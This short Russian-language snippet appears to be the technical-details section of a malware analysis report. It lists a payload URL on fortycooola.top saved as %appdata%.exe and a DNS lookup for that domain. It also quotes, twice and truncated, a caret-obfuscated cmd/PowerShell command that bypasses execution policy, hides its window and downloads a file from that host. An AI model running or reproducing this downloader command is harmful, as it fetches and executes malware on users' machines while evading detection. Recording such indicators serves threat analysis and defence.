Техническая информация
- http://fortycooola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eR^sh^E^Ll.exE -^eXeCUTi^OnPolIcy b^y^P^A^SS ^-N^O^proF^Ile -w^IndowS^tY^le ^hiDDe^n ^(n^eW^-OB^JECt sYS^teM.n^et^.W^E^bClien^T).dow^nLo^aDFi^Le('http://fortycooola.top/read.php?...
- DNS ASK fo###cooola.top
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eR^sh^E^Ll.exE -^eXeCUTi^OnPolIcy b^y^P^A^SS ^-N^O^proF^Ile -w^IndowS^tY^le ^hiDDe^n ^(n^eW^-OB^JECt sYS^teM.n^et^.W^E^bClien^T).dow^nLo^aDFi^Le('http://fortycooola.top/read.php?...' (со скрытым окном)